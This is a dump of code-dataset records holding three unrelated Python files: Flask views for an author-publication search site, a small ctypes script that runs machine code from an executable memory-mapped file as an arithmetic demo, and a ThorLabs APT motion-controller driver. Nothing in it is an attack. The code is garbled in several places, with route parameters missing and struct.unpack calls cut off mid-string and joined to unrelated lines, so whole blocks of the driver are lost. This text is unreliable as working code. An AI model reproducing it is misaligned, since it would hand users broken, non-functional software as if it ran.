args['data'] = (header, data)\n db.cache = data\n db.header_cache = header\n db.sorted_cache = [False for i in range(0, len(header))]\n return render_template('author_list.html', args=args)\n\n@app.route(\"/authors/search/author\")\ndef searchAuthorByKeyword():\n dataset = app.config['DATASET']\n db = app.config['DATABASE']\n authorname = request.args.get('fname')\n \n args = {\"dataset\":dataset, \"id\":authorname}\n try:\n authors = db.search_author(authorname)\n except:\n return searchPage()\n if (len(authors) == 1):\n author_name = authors[0].name\n return getAuthorProfile(author_name)\n else:\n return displayAuthorListWithHyperlinks(authors, args)\n \n \n \n@app.route('/authors/search')\ndef searchPage():\n dataset = app.config['DATASET']\n db = app.config['DATABASE']\n db.set_breadcrump(name=\"Author search\", link=\"/authors/search\")\n args = {\"dataset\":dataset, \"id\":'search'}\n args['title'] = 'Search'\n db.title_cache = args['title']\n args['data'] = '/authors/search/author'\n \n args['author_search_type'] = 'Search author'\n args['author_search_type_link'] = '/authors/search'\n args[\"breadcrump\"] = db.breadcrump\n return render_template('search.html', args=args)\n\n@app.route(\"/author\")\ndef firstlast():\n dataset = app.config['DATASET']\n db = app.config['DATABASE']\n args = {\"dataset\":dataset, \"id\":'search'}\n args['title'] = 'Search'\n db.title_cache = args['title']\n args['data'] = '/author/firstlast'\n \n args['author_search_type'] = 'Number of times author appeared first or last'\n args['author_search_type_link'] = '/author'\n return render_template('search.html', args=args)\n\ndef showAllAuthorsFirstLastSole():\n dataset = app.config['DATASET']\n db = app.config['DATABASE']\n PUB_TYPES = [\"Author\", \"Journals\", \"Books\", \"Book Chapters\", \"All Publications\"]\n args = {\"dataset\":dataset, \"id\":\"coauthors\"}\n args[\"title\"] = \"Co-Authors\"\n \n db.title_cache = args['title']\n start_year = db.min_year\n if \"start_year\" in request.args:\n start_year = int(request.args.get(\"start_year\"))\n\n end_year = db.max_year\n if \"end_year\" in request.args:\n end_year = int(request.args.get(\"end_year\"))\n\n pub_type = 4\n if \"pub_type\" in request.args:\n pub_type = int(request.args.get(\"pub_type\"))\n\n args[\"data\"] = db.get_coauthor_data(start_year, end_year, pub_type)\n args[\"start_year\"] = start_year\n args[\"end_year\"] = end_year\n args[\"pub_type\"] = pub_type\n args[\"min_year\"] = db.min_year\n args[\"max_year\"] = db.max_year\n args[\"start_year\"] = start_year\n args[\"end_year\"] = end_year\n args[\"pub_str\"] = PUB_TYPES[pub_type]\n db.args_cache = args\n db.title_cache = args['title']\n return render_template(\"coauthors.html\", args=args)\n\n\n@app.route(\"/profile/\")\ndef getAuthorProfile(author):\n dataset = app.config['DATASET']\n db = app.config['DATABASE']\n db.set_breadcrump(name=author, link=\"/profile/\"+author, level=2)\n args = {\"dataset\":dataset, \"id\":\"coauthors\"}\n args['title'] = author + \" profile\"\n args['real_author_name'] = author\n \n tables = db.get_author_profile(author)\n args[\"tables\"] = tables\n args[\"breadcrump\"] = db.breadcrump \n args[\"coauthor_names_dictionary\"] = db.get_coauthor_names(author)\n \n return render_template('author_profile.html',args=args )\n","sub_path":"src/comp61542/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"460504816","text":"#!/usr/bin/env python3\nimport ctypes\nimport mmap\n\ndef load_func(filename):\n src = open(filename, \"r+b\")\n buf = mmap.mmap(src.fileno(), 0, prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC)\n return buf\n\ndef asm_func(buf, argtypes, restype):\n ftype = ctypes.CFUNCTYPE(*argtypes)\n fpointer = ctypes.c_void_p.from_buffer(buf)\n f = ftype(ctypes.addressof(fpointer))\n f.argtypes = argtypes\n f.restype = restype\n return f\n\nargtypes = (ctypes.c_int, ctypes.c_int, ctypes.c_long)\nrestype = ctypes.c_long\nbuf = load_func(\"add2.bin\")\nf = asm_func(buf, argtypes, restype)\nr = f(422342, 212343, 123456789090)\nprint(r, 422342 * 212343 + 123456789090)\nbuf.close()\n","sub_path":"pyasm2.py","file_name":"pyasm2.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"553384953","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n##\n# thorlabsapt.py: Driver for the Thorlabs APT Controller.\n##\n# © 2013 Steven Casagrande (scasagrande@galvant.ca).\n#\n# This file is a part of the InstrumentKit project.\n# Licensed under the AGPL version 3.\n##\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n##\n\n## FEATURES ####################################################################\n\nfrom __future__ import division\n\n## IMPORTS #####################################################################\n\nfrom rotational_stage import _abstract\nfrom rotational_stage import _packets\nfrom rotational_stage import _cmds\n\nfrom flufl.enum import IntEnum\n\nimport quantities as pq\n\nimport re\nimport struct\n\n## LOGGING #####################################################################\n\nimport logging\nfrom rotational_stage.util_fns import NullHandler\n\nlogger = logging.getLogger(__name__)\nlogger.addHandler(NullHandler())\n\n## CLASSES #####################################################################\n\nclass ThorLabsAPT(_abstract.ThorLabsInstrument):\n '''\n Generic ThorLabs APT hardware device controller. Communicates using the \n ThorLabs APT communications protocol, whose documentation is found in the\n thorlabs source folder.\n '''\n \n class APTChannel(object):\n '''\n Represents a channel within the hardware device. One device can have \n many channels, each labeled by an index.\n '''\n def __init__(self, apt, idx_chan):\n self._apt = apt\n # APT is 1-based, but we want the Python representation to be\n # 0-based.\n self._idx_chan = idx_chan + 1\n \n @property\n def enabled(self):\n pkt = _packets.ThorLabsPacket(message_id=_cmds.ThorLabsCommands.MOD_REQ_CHANENABLESTATE,\n param1=self._idx_chan,\n param2=0x00,\n dest=self._apt._dest,\n source=0x01,\n data=None)\n resp = self._apt.querypacket(pkt, expect=_cmds.ThorLabsCommands.MOD_GET_CHANENABLESTATE)\n return not bool(resp._param2 - 1)\n @enabled.setter\n def enabled(self, newval):\n pkt = _packets.ThorLabsPacket(message_id=_cmds.ThorLabsCommands.MOD_SET_CHANENABLESTATE,\n param1=self._idx_chan,\n param2=0x01 if newval else 0x02,\n dest=self._apt._dest,\n source=0x01,\n data=None)\n self._apt.sendpacket(pkt)\n \n _channel_type = APTChannel\n \n def __init__(self, filelike):\n super(ThorLabsAPT, self).__init__(filelike)\n self._dest = 0x50 # Generic USB device; make this configurable later.\n \n # Provide defaults in case an exception occurs below.\n self._serial_number = None\n self._model_number = None\n self._hw_type = None\n self._fw_version = None\n self._notes = \"\"\n self._hw_version = None\n self._mod_state = None\n self._n_channels = 0\n self._channel = ()\n \n # Perform a HW_REQ_INFO to figure out the model number, serial number,\n # etc.\n try:\n req_packet = _packets.ThorLabsPacket(\n message_id=_cmds.ThorLabsCommands.HW_REQ_INFO,\n param1=0x00,\n param2=0x00,\n dest=self._dest,\n source=0x01,\n data=None\n )\n hw_info = self.querypacket(req_packet, expect=_cmds.ThorLabsCommands.HW_GET_INFO)\n \n self._serial_number = str(hw_info._data[0:4]).encode('hex')\n self._model_number = str(hw_info._data[4:12]).replace('\\x00', '').strip()\n \n hw_type_int = struct.unpack(' 0:\n self._channel = list(self._channel_type(self, chan_idx) for chan_idx in xrange(self._n_channels) )\n \n @property\n def serial_number(self):\n return self._serial_number\n \n @property\n def model_number(self):\n return self._model_number\n \n @property\n def name(self):\n return \"ThorLabs APT Instrument model {model}, serial {serial} (HW version {hw_ver}, FW version {fw_ver})\".format(\n hw_ver=self._hw_version, serial=self.serial_number, \n fw_ver=self._fw_version, model=self.model_number\n )\n \n @property\n def channel(self):\n return self._channel\n \n @property\n def n_channels(self):\n return self._n_channels\n \n @n_channels.setter\n def n_channels(self, nch):\n # Change the number of channels so as not to modify those instances already existing:\n # If we add more channels, append them to the list,\n # If we remove channels, remove them from the end of the list.\n if nch > self._n_channels:\n self._channel = self._channel + \\\n list( self._channel_type(self, chan_idx) for chan_idx in xrange(self._n_channels, nch) )\n elif nch < self._n_channels:\n self._channel = self._channel[:nch]\n self._n_channels = nch\n \n def identify(self):\n '''\n Causes a light on the APT instrument to blink, so that it can be\n identified.\n '''\n pkt = _packets.ThorLabsPacket(message_id=_cmds.ThorLabsCommands.MOD_IDENTIFY,\n param1=0x00,\n param2=0x00,\n dest=self._dest,\n source=0x01,\n data=None)\n self.sendpacket(pkt)\n\nclass APTPiezoDevice(ThorLabsAPT):\n '''\n Generic ThorLabs APT piezo device, superclass of more specific piezo devices.\n '''\n \n class PiezoDeviceChannel(ThorLabsAPT.APTChannel):\n ## PIEZO COMMANDS ##\n \n @property\n def max_travel(self):\n pkt = _packets.ThorLabsPacket(message_id=_cmds.ThorLabsCommands.PZ_REQ_MAXTRAVEL,\n param1=self._idx_chan,\n param2=0x00,\n dest=self._apt._dest,\n source=0x01,\n data=None)\n resp = self._apt.querypacket(pkt)\n \n # Not all APT piezo devices support querying the maximum travel\n # distance. Those that do not simply ignore the PZ_REQ_MAXTRAVEL\n # packet, so that the response is empty.\n if resp is None:\n return NotImplemented\n \n chan, int_maxtrav = struct.unpack(' 0))\n for key, bit_mask in self.__STATUS_BIT_MASK.iteritems()\n )\n \n return status_dict\n \n @property\n def position(self):\n pkt = _packets.ThorLabsPacket(message_id=_cmds.ThorLabsCommands.MOT_REQ_POSCOUNTER,\n param1=self._idx_chan,\n param2=0x00,\n dest=self._apt._dest,\n source=0x01,\n data=None)\n response = self._apt.querypacket(pkt, expect=_cmds.ThorLabsCommands.MOT_GET_POSCOUNTER)\n chan, pos = struct.unpack('